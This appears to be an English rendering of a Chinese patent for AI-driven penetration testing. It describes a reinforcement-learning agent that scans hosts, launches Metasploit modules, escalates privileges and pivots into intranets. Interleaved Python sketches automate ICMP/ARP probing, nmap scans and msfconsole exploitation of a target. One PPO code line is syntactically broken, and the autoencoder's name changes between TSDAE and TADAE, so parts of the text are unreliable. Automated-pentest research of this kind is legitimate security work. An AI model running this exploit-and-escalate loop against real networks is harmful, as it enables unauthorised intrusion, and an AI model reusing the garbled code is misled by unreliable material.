where $r_t(\theta)$ represents the policy update amplitude, i.e., for state $s_t$, the ratio of the probability of taking action $a_t$ under the current policy to the probability of taking action $a_t$ under the old policy; $\hat{A}_t$ is the advantage function, which measures how good the current state and action are relative to the average level and represents the difference between the value of the current state-action pair and the average value, $\hat{A}_t=Q(s_t,a_t)-V(s_t)$, where $Q(s_t,a_t)$ represents the value of taking action $a_t$ in the current state and $V(s_t)$ represents the average value in the current state; clip is the clipping function, and $\epsilon$ is a hyperparameter that controls the strength of the clipping. The loss function of the critic network is:

$$L^{\mathrm{critic}}=\mathbb{E}_t\!\left[\left(V_\theta(s_t)-R_t\right)^2\right]$$

where $V_\theta(s_t)$ represents the expected return of the current state and $R_t$ represents the true return of state $s_t$.
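The two losses can be written compactly as below, a hedged PyTorch sketch operating on one sampled batch; the tensor shapes and function boundaries are assumptions:

```python
import torch

def ppo_losses(probs_new, probs_old, actions, advantages, values_pred, returns,
               eps: float = 0.2):
    """Clipped PPO actor loss and squared-error critic loss for one batch."""
    # Importance weight r_t = pi_new(a_t|s_t) / pi_old(a_t|s_t).
    p_new = probs_new.gather(1, actions.unsqueeze(1)).squeeze(1)
    p_old = probs_old.gather(1, actions.unsqueeze(1)).squeeze(1)
    ratio = p_new / p_old.detach()
    # Clipped surrogate objective (negated, since optimizers minimize).
    surr1 = ratio * advantages
    surr2 = torch.clamp(ratio, 1 - eps, 1 + eps) * advantages
    actor_loss = -torch.min(surr1, surr2).mean()
    # Critic regresses the predicted value toward the true return.
    critic_loss = (values_pred - returns).pow(2).mean()
    return actor_loss, critic_loss
```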
Step 111: and (3) the intranet node discovery and proxy construction are carried out, and the target queue to be tested is updated.
In some embodiments, after obtaining the authority of the target host, the system performs intranet node discovery on the controlled host, scans and discovers intranet surviving nodes connected with the host in an arp scanning and local information reading mode, builds a proxy link to forward traffic, and adds newly discovered intranet surviving nodes into the target queue to be tested.
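A sketch of the queue update after a host is controlled; run_with_output is a pymetasploit3 shell-session call, and the ARP-cache parsing here is a simplified illustration rather than the patent's mechanism:

```python
import re

def discover_intranet_nodes(shell_session) -> list[str]:
    """Read the controlled host's ARP cache to find intranet neighbors."""
    output = shell_session.run_with_output('arp -a')
    return re.findall(r'\d{1,3}(?:\.\d{1,3}){3}', output)

def update_target_queue(target_queue, tested: set, shell_session) -> None:
    """Append newly discovered, not-yet-tested nodes to the queue (step 111)."""
    for ip in discover_intranet_nodes(shell_session):
        if ip not in tested:
            tested.add(ip)
            target_queue.append(ip)
```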
In summary, the method trains a text embedding model based on TSDAE and can directly encode environment state information in text form into a state vector that is input to the deep reinforcement learning decision maker. The embedding model trained in this application captures the semantic information shared among state descriptions, so that the decision maker can decide on similar actions for similar inputs; this enables policy migration across scenarios and training in real network scenarios, effectively solving the problem that models trained in simulated environments are difficult to apply to real network scenarios.
The second aspect of the application provides an intelligent penetration test system based on deep reinforcement learning. The system comprises: a first processing unit configured to: acquire a state vector of a target host and input the state vector to a deep reinforcement learning decision maker, wherein the deep reinforcement learning decision maker determines an executable action for the target host according to an action execution policy; a second processing unit configured to: execute the determined executable action on the target host with a tool load corresponding to the determined executable action, so as to acquire a feedback result and a reward signal of the target host after the determined executable action is executed; a third processing unit configured to: input the feedback result to the denoising autoencoder TSDAE to update the state vector of the target host, and input the reward signal to the deep reinforcement learning decision maker to update the action execution policy.
The executable actions include: a first action for determining open port information of the target host; a second action for testing vulnerabilities present in the target host and acquiring a first privilege on the target host; and a third action for further acquiring a second privilege on the target host once the first privilege has been acquired, the second privilege being higher than the first privilege.
The system according to the second aspect of the present invention further comprises a preprocessing unit configured to: perform survivability detection on each host in the target network based on the ICMP and ARP protocols, and select the target host by breadth-first search from the plurality of hosts that pass the survivability detection.
The preprocessing unit is specifically configured to: acquire the address of the target network, send survivability detection messages to the address of the target network based on the ICMP and ARP protocols, and receive the survivability detection response messages to determine the plurality of hosts that pass the survivability detection; add the plurality of hosts that pass the survivability detection to a queue of target hosts to be tested, and select a target IP from the queue by breadth-first search; initialize the state vector of the host corresponding to the target IP, judge whether the number of actions already executed on the host corresponding to the target IP exceeds a threshold, and if not, take the host corresponding to the target IP as the target host.
According to the system of the second aspect of the present invention, the acquired state vector of the target host is a one-dimensional vector comprising the target host's access control state, open port list, running service list, operating system information, page fingerprint information and historically executed actions; the action execution policy adopts a reinforcement learning algorithm over a discrete action space, the neural network of the deep reinforcement learning decision maker determines the selection probability of each executable action in the action space given the state vector of the target host, and the executable action with the highest selection probability is taken as the executable action for the target host.
According to the system of the second aspect of the present invention, the second processing unit is specifically configured to: select the tool load corresponding to the determined executable action from the Metasploit database and execute the determined executable action on the target host; specifically: when the first action is executed, Nmap and WhatWeb are used to automatically detect the target host's open ports, running services, operating system and page fingerprints; the feedback information acquired after the first action is executed is the open port information of the target host and the potential vulnerabilities of the target host further determined based on that open port information; when the second action is executed, the vulnerability test script corresponding to the second action is retrieved from the Metasploit database and executed; the feedback information acquired after the second action is executed is the vulnerabilities of the target host determined from the vulnerability test result and the first privilege on the target host further acquired once the vulnerabilities are confirmed to exist; when the third action is executed, the post-penetration test script corresponding to the third action is retrieved from the Metasploit database and executed; the feedback information acquired after the third action is executed is the penetration status of the target host determined from the penetration test result and the further acquired second privilege on the target host.
According to the system of the second aspect of the present invention, the second processing unit is specifically configured to calculate the reward signal as follows: for the case of executing the first action, the reward signal r1 = -Cost(a), where Cost(a) represents the cost of executing the first action; for the case of executing the second action, the reward signal r2 = Value(h1) - Cost(b), where Value(h1) represents the forward value after the first privilege is acquired and Cost(b) represents the cost of executing the second action; for the case of executing the third action, the reward signal r3 = Value(h2) - Cost(c), where Value(h2) represents the forward value after the second privilege is acquired and Cost(c) represents the cost of executing the third action. The experience tuple $(s, a, r, s')$ is stored in an experience replay pool, where $s$ is the current state vector, $a$ is the currently executed action, $r$ is the reward signal, and $s'$ is the next state vector.
According to the system of the second aspect of the present invention, the third processing unit is specifically configured such that the denoising autoencoder TSDAE comprises an encoder, a pooling layer and a decoder; after passing through TSDAE, the feedback result yields a fixed-length dense vector, which is used to update the state vector of the target host. The objective function used when training TSDAE is:

$$J(\theta)=\mathbb{E}_{x\sim D}\left[\sum_{t=1}^{l}\log\frac{\exp\!\left(h_t^{\top}e_t\right)}{\sum_{i=1}^{N}\exp\!\left(h_t^{\top}e_i\right)}\right]$$

where $D$ is the data set of training sentences, $x$ is the set of tokens obtained by tokenizing a sentence, $e_t$ is the word vector of token $x_t$, $N$ is the vocabulary size, $h_t$ is the hidden state at step $t$ of the decoding process, and $l$ is the total number of decoding steps.
According to the system of the second aspect of the present invention, the second processing unit is specifically configured to train the deep reinforcement learning decision maker with the proximal policy optimization algorithm PPO. When the action execution policy is updated, PPO samples experience tuples $(s_t, a_t, r_t, s_{t+1})$ from the experience replay pool and calculates the policy update amplitude

$$r_t(\theta)=\frac{\pi_\theta(a_t\mid s_t)}{\pi_{\theta_{\mathrm{old}}}(a_t\mid s_t)}$$

where $\pi_\theta(a_t\mid s_t)$ is the probability of taking action $a_t$ in state $s_t$ under the updated policy, and $\pi_{\theta_{\mathrm{old}}}(a_t\mid s_t)$ is the probability of taking action $a_t$ in state $s_t$ under the old policy.

The loss function of the actor network of the proximal policy optimization algorithm PPO is:

$$L^{\mathrm{actor}}(\theta)=\mathbb{E}_t\!\left[\min\!\left(r_t(\theta)\hat{A}_t,\ \mathrm{clip}\!\left(r_t(\theta),\,1-\epsilon,\,1+\epsilon\right)\hat{A}_t\right)\right]$$

where the advantage function $\hat{A}_t=Q(s_t,a_t)-V(s_t)$, $Q(s_t,a_t)$ represents the value of taking action $a_t$ in state $s_t$ under the old policy, $V(s_t)$ represents the average value of the actions taken in state $s_t$ under the old policy, clip is the clipping function, $\epsilon$ is a hyperparameter that controls the strength of the clipping, and $\mathbb{E}$ denotes expectation;

the loss function of the critic network of the proximal policy optimization algorithm PPO is:

$$L^{\mathrm{critic}}=\mathbb{E}_t\!\left[\left(V_\theta(s_t)-R_t\right)^2\right]$$

where $V_\theta(s_t)$ represents the expected return of state $s_t$ and $R_t$ represents the true return of state $s_t$.
A third aspect of the invention discloses an electronic device. The electronic device includes a memory and a processor, the memory storing a computer program, the processor implementing the steps in the intelligent penetration test method based on deep reinforcement learning according to the first aspect of the disclosure when executing the computer program.
Fig. 4 is a block diagram of an electronic device according to an embodiment of the present invention, and as shown in fig. 4, the electronic device includes a processor, a memory, a communication interface, a display screen, and an input device connected through a system bus. Wherein the processor of the electronic device is configured to provide computing and control capabilities. The memory of the electronic device includes a nonvolatile storage medium and an internal memory. The non-volatile storage medium stores an operating system and a computer program. The internal memory provides an environment for the operation of the operating system and computer programs in the non-volatile storage media. The communication interface of the electronic device is used for conducting wired or wireless communication with an external terminal, and the wireless communication can be achieved through WIFI, an operator network, near Field Communication (NFC) or other technologies. The display screen of the electronic equipment can be a liquid crystal display screen or an electronic ink display screen, and the input device of the electronic equipment can be a touch layer covered on the display screen, can also be keys, a track ball or a touch pad arranged on the shell of the electronic equipment, and can also be an external keyboard, a touch pad or a mouse and the like.
It will be appreciated by those skilled in the art that the structure shown in fig. 4 is merely a block diagram of a portion related to the technical solution of the present disclosure, and does not constitute a limitation of the electronic device to which the technical solution of the present disclosure is applied, and a specific electronic device may include more or less components than those shown in the drawings, or may combine some components, or have different component arrangements.
A fourth aspect of the application discloses a computer-readable storage medium. The computer readable storage medium stores a computer program which, when executed by a processor, implements the steps in an intelligent penetration test method based on deep reinforcement learning according to the first aspect of the present disclosure.
In summary, the technical scheme provided by the application characterizes the state space based on a text embedding technique, makes penetration test action decisions based on deep reinforcement learning, and performs automatic load invocation based on the Metasploit database; learning and training can be carried out in diversified target machine environments, and the agent's decision-making capability evolves over the course of iterative training.
The technical features of the above embodiments may be combined arbitrarily. For brevity, not all possible combinations of the technical features in the above embodiments are described; however, as long as there is no contradiction in a combination of these technical features, it should be regarded as falling within the scope of this specification. The above examples illustrate only a few embodiments of the application; their description is relatively specific and detailed, but they are not to be construed as limiting the scope of the application. It should be noted that several variations and modifications can be made by those skilled in the art without departing from the concept of the application, and these all fall within the protection scope of the application. Accordingly, the scope of protection of the present application is to be determined by the appended claims.

Claims (10)

1. An intelligent penetration test method based on deep reinforcement learning, which is characterized by comprising the following steps:
step S1, acquiring a state vector of a target host, and inputting the state vector to a deep reinforcement learning decision maker, wherein the deep reinforcement learning decision maker determines an executable action for the target host according to an action execution policy;
step S2, executing the determined executable action on the target host by adopting a tool load corresponding to the determined executable action so as to acquire a feedback result and a reward signal of the target host after executing the determined executable action;
step S3, inputting the feedback result to a denoising autoencoder TSDAE to update the state vector of the target host, and inputting the reward signal to the deep reinforcement learning decision maker to update the action execution policy;
wherein the executable actions include:
a first action for determining open port information of the target host;
a second action for testing vulnerabilities present in the target host and acquiring a first privilege on the target host; and
a third action for further acquiring a second privilege on the target host in the case where the first privilege has been acquired;
wherein the second privilege is higher than the first privilege.
2. The method for intelligent penetration testing based on deep reinforcement learning of claim 1, further comprising:
step S0, carrying out survivability detection on each host in a target network based on an ICMP protocol and an ARP protocol, and selecting the target host from a plurality of hosts passing through the survivability detection in a breadth-first search mode;
the step S0 specifically includes:
acquiring the address of the target network, sending liveness detection messages to the address of the target network based on the ICMP protocol and the ARP protocol, and receiving the liveness detection response messages to determine the plurality of hosts that pass the liveness detection;
adding the plurality of hosts that pass the liveness detection to a queue of target hosts to be tested, and selecting a target IP from the queue by breadth-first search;
initializing the state vector of the host corresponding to the target IP, judging whether the number of actions already executed against the host corresponding to the target IP exceeds a threshold value, and if not, taking the host corresponding to the target IP as the target host.
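A minimal sketch of step S0, assuming Python with the scapy library (root privileges are required for raw packets); `max_attempts` and the helper names are hypothetical, not taken from the patent:

```python
from collections import deque
from scapy.all import IP, ICMP, ARP, Ether, sr1, srp  # pip install scapy

def is_alive(ip: str, timeout: float = 1.0) -> bool:
    """Liveness probe combining an ICMP echo and an ARP request."""
    if sr1(IP(dst=ip) / ICMP(), timeout=timeout, verbose=0) is not None:
        return True
    answered, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip),
                      timeout=timeout, verbose=0)
    return len(answered) > 0

def build_target_queue(network_ips):
    """Breadth-first queue of live hosts awaiting testing."""
    return deque(ip for ip in network_ips if is_alive(ip))

def next_target(queue, action_counts, max_attempts=100):
    """Pop hosts breadth-first, skipping any whose executed-action count
    already exceeds the threshold of claim 2."""
    while queue:
        ip = queue.popleft()
        if action_counts.get(ip, 0) <= max_attempts:
            return ip
    return None
```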
3. The intelligent penetration test method based on deep reinforcement learning according to claim 2, wherein in the step S1:
the acquired state vector of the target host is a one-dimensional vector comprising the access control state, the open port list, the running service list, the operating system information, the page fingerprint information and the historically executed actions of the target host;
the action execution strategy adopts a reinforcement learning algorithm for a discrete action space; the neural network of the deep reinforcement learning decision maker determines, given the state vector of the target host, the selection probability of each executable action in the action space, and the executable action with the maximum selection probability is taken as the executable action for the target host.
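A brief sketch of claim 3 in Python with PyTorch; the six field tensors and the policy network are assumed to be provided elsewhere, and greedy argmax selection follows the "maximum selection probability" wording:

```python
import torch

def build_state(access_ctrl, ports, services, os_info, fingerprints, history):
    """Concatenate the six fields of claim 3 into one one-dimensional vector."""
    return torch.cat([access_ctrl, ports, services, os_info, fingerprints, history])

def select_action(policy_net: torch.nn.Module, state_vec: torch.Tensor) -> int:
    """Pick the executable action with the maximum selection probability."""
    probs = torch.softmax(policy_net(state_vec), dim=-1)
    return int(torch.argmax(probs).item())
```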
4. The method of intelligent penetration testing based on deep reinforcement learning according to claim 3, wherein in the step S2, the tool payload corresponding to the determined executable action is selected from the Metasploit database, and the determined executable action is executed on the target host; specifically comprising:
when executing the first action, automatically detecting the open ports, running services, operating system and page fingerprints of the target host by using Nmap and whatweb;
the feedback information acquired after executing the first action is: the open port information of the target host, and the potential vulnerabilities of the target host further determined based on the open port information;
when executing the second action, searching the vulnerability test script corresponding to the second action from the Metasploit database and executing the vulnerability test script;
the feedback information acquired after executing the second action is: the vulnerabilities of the target host determined from the vulnerability test result, and the first privilege of the target host further acquired after the vulnerabilities are confirmed to exist;
when executing the third action, searching the penetration test script corresponding to the third action from the Metasploit database and executing the penetration test script;
the feedback information acquired after executing the third action is: the penetration status of the target host determined from the penetration test result, and the second privilege of the target host that is further acquired.
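As a hedged sketch of how the tool payloads of claim 4 could be driven from Python via the standard Nmap and Metasploit command-line interfaces (the mapping from action to Metasploit module path is assumed to be handled elsewhere; timeouts are placeholders):

```python
import subprocess

def run_recon(target: str) -> str:
    """First action: service/OS detection with Nmap (-O needs root);
    whatweb can be invoked analogously for page fingerprints."""
    out = subprocess.run(["nmap", "-sV", "-O", target],
                         capture_output=True, text=True, timeout=600)
    return out.stdout

def run_msf_module(module: str, target: str) -> str:
    """Second/third action: run a Metasploit module non-interactively."""
    cmd = f"use {module}; set RHOSTS {target}; run; exit"
    out = subprocess.run(["msfconsole", "-q", "-x", cmd],
                         capture_output=True, text=True, timeout=900)
    return out.stdout
```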
5. The intelligent penetration test method based on deep reinforcement learning according to claim 4, wherein in the step S2, the reward signal is calculated by:
for the case of executing the first action, the reward signal r1 = -Cost(a), where Cost(a) represents the cost of executing the first action;
for the case of executing the second action, the reward signal r2 = Value(h1) - Cost(b), where Value(h1) represents the forward value obtained after the first privilege is acquired, and Cost(b) represents the cost of executing the second action;
for the case of executing the third action, the reward signal r3 = Value(h2) - Cost(c), where Value(h2) represents the forward value obtained after the second privilege is acquired, and Cost(c) represents the cost of executing the third action;
the reward tuple (s, a, r, s') is stored in an experience replay pool, wherein s is the current state vector, a is the currently executed action, r is the reward signal, and s' is the next state vector.
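A compact sketch of claim 5's reward scheme in Python; the concrete Value/Cost numbers below are placeholders, not values given by the patent:

```python
from typing import Optional

COSTS = {"first": 1.0, "second": 4.0, "third": 6.0}   # Cost(a), Cost(b), Cost(c)
VALUES = {"h1": 50.0, "h2": 100.0}                    # Value(h1), Value(h2)

def reward_signal(action: str, privilege_gained: Optional[str]) -> float:
    """r = Value(h) - Cost(action); the first (recon) action earns no value."""
    value = VALUES.get(privilege_gained, 0.0) if privilege_gained else 0.0
    return value - COSTS[action]

replay_pool = []  # stores (s, a, r, s') tuples for later sampling by PPO

def store_transition(s, a, r, s_next):
    replay_pool.append((s, a, r, s_next))
```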
6. The intelligent penetration test method based on deep reinforcement learning according to claim 5, wherein in the step S3, the denoising autoencoder TADAE comprises an encoder, a pooling layer and a decoder, and the feedback result is encoded by the denoising autoencoder TADAE into a dense vector of fixed length so as to update the state vector of the target host; the objective function used in training the denoising autoencoder TADAE is:

$$\mathcal{L} = \sum_{x \in D} \sum_{t=1}^{l} -\log p(x_t \mid h_t), \qquad p(x_t \mid h_t) = \frac{\exp(w_{x_t}^{\top} h_t)}{\sum_{i=1}^{N} \exp(w_i^{\top} h_t)}$$

wherein D is the dataset of training sentences, x is the token set obtained after word segmentation of a sentence, $w_i$ is the word vector of the i-th word, N is the vocabulary size, $h_t$ is the hidden state of the t-th step in the decoding process, and l represents the total number of decoding steps.
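A minimal PyTorch sketch of a text denoising autoencoder in the spirit of claim 6 (GRU encoder, mean pooling to a fixed-length dense vector, GRU decoder reconstructing the clean tokens); all layer types and dimensions are assumptions, since the patent does not specify the architecture:

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class TADAE(nn.Module):
    def __init__(self, vocab_size: int, emb_dim: int = 128, hid_dim: int = 256):
        super().__init__()
        self.embed = nn.Embedding(vocab_size, emb_dim)
        self.encoder = nn.GRU(emb_dim, hid_dim, batch_first=True)
        self.decoder = nn.GRU(emb_dim, hid_dim, batch_first=True)
        self.out = nn.Linear(hid_dim, vocab_size)

    def encode(self, noisy_tokens: torch.Tensor) -> torch.Tensor:
        """Map a (batch, seq_len) token batch to a fixed-length dense vector."""
        enc_out, _ = self.encoder(self.embed(noisy_tokens))
        return enc_out.mean(dim=1)  # pooling layer: mean over the sequence

    def forward(self, noisy_tokens, clean_tokens):
        z = self.encode(noisy_tokens)
        dec_in = self.embed(clean_tokens[:, :-1])          # teacher forcing
        dec_out, _ = self.decoder(dec_in, z.unsqueeze(0))  # init hidden from z
        logits = self.out(dec_out)
        # negative log-likelihood of each clean token given hidden state h_t
        return F.cross_entropy(logits.reshape(-1, logits.size(-1)),
                               clean_tokens[:, 1:].reshape(-1))
```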
7. The intelligent penetration test method based on deep reinforcement learning according to claim 6, wherein in the step S3, the deep reinforcement learning decision maker is trained by using the proximal policy optimization algorithm PPO, and when updating the action execution strategy:
the proximal policy optimization algorithm PPO samples the stored reward tuples from the experience replay pool and calculates the policy update ratio

$$r_t(\theta) = \frac{\pi_{\theta}(a_t \mid s_t)}{\pi_{\theta_{old}}(a_t \mid s_t)}$$

wherein $\pi_{\theta}(a_t \mid s_t)$ represents the probability of taking action $a_t$ in state $s_t$ under the updated policy, and $\pi_{\theta_{old}}(a_t \mid s_t)$ represents the probability of taking action $a_t$ in state $s_t$ under the non-updated policy;
the loss function of the actor network of the proximal policy optimization algorithm PPO is:

$$L^{actor}(\theta) = \mathbb{E}\left[\min\left(r_t(\theta)\,\hat{A}_t,\ \mathrm{clip}\big(r_t(\theta),\,1-\epsilon,\,1+\epsilon\big)\,\hat{A}_t\right)\right]$$

wherein the advantage function $\hat{A}_t = Q(s_t, a_t) - V(s_t)$, with $Q(s_t, a_t)$ representing the value of taking action $a_t$ in state $s_t$ based on the updated policy, $V(s_t)$ representing the average value of the actions taken in state $s_t$ based on the non-updated policy; clip is a clipping function, $\epsilon$ is a hyperparameter controlling the strength of the clipping function, and $\mathbb{E}$ denotes the expectation;
the loss function of the critic network of the proximal policy optimization algorithm PPO is:

$$L^{critic} = \mathbb{E}\left[\big(\hat{R}(s_t) - R(s_t)\big)^2\right]$$

wherein $\hat{R}(s_t)$ represents the expected return of state $s_t$ estimated by the critic network, and $R(s_t)$ represents the true return of state $s_t$.
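The reconstructed PPO losses above translate directly into a few lines of PyTorch; this is a sketch of the standard PPO-clip computation, with $\epsilon = 0.2$ and the advantage estimate assumed to be computed elsewhere:

```python
import torch
import torch.nn.functional as F

def ppo_losses(new_logp, old_logp, advantage, value_pred, returns, eps=0.2):
    """Clipped-surrogate actor loss and squared-error critic loss."""
    ratio = torch..exp(new_logp - old_logp) if False else torch.exp(new_logp - old_logp)  # pi_theta / pi_theta_old
    clipped = torch.clamp(ratio, 1.0 - eps, 1.0 + eps)
    actor_loss = -torch.min(ratio * advantage, clipped * advantage).mean()
    critic_loss = F.mse_loss(value_pred, returns)  # E[(R_hat - R)^2]
    return actor_loss, critic_loss
```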
8. An intelligent penetration testing system based on deep reinforcement learning, the system comprising:
a first processing unit configured to: acquire a state vector of a target host and input the state vector to a deep reinforcement learning decision maker, wherein the deep reinforcement learning decision maker determines an executable action for the target host according to an action execution strategy;
a second processing unit configured to: execute the determined executable action on the target host with a tool payload corresponding to the determined executable action, so as to acquire a feedback result and a reward signal of the target host after the determined executable action is executed;
a third processing unit configured to: input the feedback result to a denoising autoencoder TADAE to update the state vector of the target host, and input the reward signal to the deep reinforcement learning decision maker to update the action execution strategy;
wherein the executable actions include:
A first action for determining open port information of the target host;
a second action for testing the vulnerabilities present in the target host and acquiring a first privilege of the target host; and
a third action for further acquiring a second privilege of the target host in the case where the first privilege has been acquired;
wherein the second privilege is higher than the first privilege.
9. An electronic device comprising a memory and a processor, the memory storing a computer program, wherein the processor, when executing the computer program, implements the steps of the intelligent penetration test method based on deep reinforcement learning according to any one of claims 1-7.
10. A computer-readable storage medium having a computer program stored thereon, wherein the computer program, when executed by a processor, implements the steps of the intelligent penetration test method based on deep reinforcement learning according to any one of claims 1-7.
CN202311504014.2A 2023-11-13 2023-11-13 Intelligent penetration test method and system based on deep reinforcement learning Active CN117235742B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202311504014.2A CN117235742B (en) 2023-11-13 2023-11-13 Intelligent penetration test method and system based on deep reinforcement learning


Publications (2)

Publication Number Publication Date
CN117235742A true CN117235742A (en) 2023-12-15
CN117235742B CN117235742B (en) 2024-05-14

Family

ID=89082916

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202311504014.2A Active CN117235742B (en) 2023-11-13 2023-11-13 Intelligent penetration test method and system based on deep reinforcement learning

Country Status (1)

Country Link
CN (1) CN117235742B (en)

Patent Citations (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20140331326A1 (en) * 2013-05-06 2014-11-06 Staples, Inc. IT Vulnerability Management System
WO2019079621A1 (en) * 2017-10-19 2019-04-25 Circadence Corporation Method and system for penetration testing classification based on captured log data
US20190258953A1 (en) * 2018-01-23 2019-08-22 Ulrich Lang Method and system for determining policies, rules, and agent characteristics, for automating agents, and protection
WO2022083029A1 (en) * 2020-10-19 2022-04-28 深圳大学 Decision-making method based on deep reinforcement learning
CN114444086A (en) * 2022-01-28 2022-05-06 南京邮电大学 Automatic Windows domain penetration method based on reinforcement learning
CN115102705A (en) * 2022-04-02 2022-09-23 中国人民解放军国防科技大学 Automatic network security detection method based on deep reinforcement learning
CN114866358A (en) * 2022-07-07 2022-08-05 中国人民解放军国防科技大学 Automatic penetration testing method and system based on knowledge graph

Non-Patent Citations (4)

* Cited by examiner, † Cited by third party
Title
JINYING CHEN: "GAIL-PT: An intelligent penetration testing framework with generative adversarial imitation learning", Computers and Security
YONGJIE WANG: "DQfD-AIPT: An intelligent penetration testing framework incorporating expert demonstration data", Security and Communication Networks
刘桂香; 孙乐昌; 刘京菊; 钟高贤: "Research on the asynchrony problem in intrusion detection", Computer Applications and Software, no. 09
孙乐昌; 刘京菊; 王永杰; 陆余良: "Research on fingerprint probing technology based on the ICMP protocol", Computer Science, no. 01

Cited By (2)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN117610002A (en) * 2024-01-22 2024-02-27 南京众智维信息科技有限公司 Multi-mode feature alignment-based lightweight malicious software threat detection method
CN117610002B (en) * 2024-01-22 2024-04-30 南京众智维信息科技有限公司 Multi-mode feature alignment-based lightweight malicious software threat detection method

Also Published As

Publication number Publication date
CN117235742B (en) 2024-05-14

Similar Documents

Publication Publication Date Title
CN117235742B (en) Intelligent penetration test method and system based on deep reinforcement learning
CN110460572B (en) Mobile target defense strategy selection method and equipment based on Markov signal game
US11120354B2 (en) System and method for aiding decision
Li et al. Optimal timing of moving target defense: A Stackelberg game model
CN117425902A (en) Mitigating simultaneous predictive and optimization of a model against attack
Horák et al. Solving zero-sum one-sided partially observable stochastic games
Evans et al. RAIDER: Reinforcement-aided spear phishing detector
Al-Maslamani et al. Toward secure federated learning for iot using drl-enabled reputation mechanism
Zhang et al. Optimal Decision‐Making Approach for Cyber Security Defense Using Game Theory and Intelligent Learning
Zhao et al. A hybrid ranking approach to estimate vulnerability for dynamic attacks
Bidgoly et al. Robustness evaluation of trust and reputation systems using a deep reinforcement learning approach
Polich et al. Interactive dynamic influence diagrams
Luo et al. A fictitious play‐based response strategy for multistage intrusion defense systems
Dehghan et al. Proapt: Projection of apt threats with deep reinforcement learning
Alavizadeh et al. A Markov game model for AI-based cyber security attack mitigation
Kinneer et al. Modeling observability in adaptive systems to defend against advanced persistent threats
Nyberg et al. Training Automated Defense Strategies Using Graph-based Cyber Attack Simulations
Pashaei et al. Honeypot intrusion detection system using an adversarial reinforcement learning for industrial control networks
CN114238992A (en) Threat vulnerability mining method based on big information security data and information security system
Chen et al. Backdoor attacks on multiagent collaborative systems
Lewis et al. Deceptive reinforcement learning in model-free domains
CN117439794B (en) CPPS optimal defense strategy game method for uncertainty attack
CN114124784B (en) Intelligent routing decision protection method and system based on vertical federation
Pekaslan et al. Leveraging it2 input fuzzy sets in non-singleton fuzzy logic systems to dynamically adapt to varying uncertainty levels
CN117675313A (en) Automated penetration test method, device, equipment and storage medium

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant